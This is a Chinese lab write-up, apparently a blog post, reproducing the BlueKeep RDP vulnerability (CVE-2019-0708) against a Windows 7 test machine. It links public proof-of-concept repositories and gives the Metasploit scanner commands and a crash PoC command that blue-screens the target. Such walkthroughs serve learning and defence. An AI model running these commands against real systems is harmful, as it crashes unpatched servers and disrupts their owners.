CVE 2019-0708 漏洞复现

**CVE-2019-0708漏洞复现**

目标机:192.168.91.147
攻击机:192.168.91.146

危害涉及:
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP

准备工作:
目标机为win7,开启远程桌面,关闭防火墙

1.开启远程桌面:控制面板-系统与安全-系统-远程设置-选择运行连接远程桌面-添加用户
2.关闭防火墙:控制面板-系统与安全-windows防火墙-关闭(两个都关)
攻击机下载:

https://github.com/zerosum0x0/CVE-2019-0708
https://github.com/n1xbyte/cve-2019-0708

解压压缩包,并将cve_2019_0708_bluekeep.rb文件放进/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录
打开msf:
为了防止不必要的错误
先搜索一下0708脚本
在这里插入图片描述
的确存在
检测模块:use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
设置目标:set RHOSTS 192.168.91.147
直接run:得到:
在这里插入图片描述
由 the target is vulnerable直到目标机的确存在此漏洞
在执行脚本前,先安装python的impacket库: pip3 install impacket

python3 /root/CVE-2019-0708-master/crashpoc.py 192.168.91.147 64

由于我没有将python文件放在msf文件下,所以使用的绝对路径:
在这里插入图片描述
再去看看win7,已经蓝屏
在这里插入图片描述
复现完毕!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值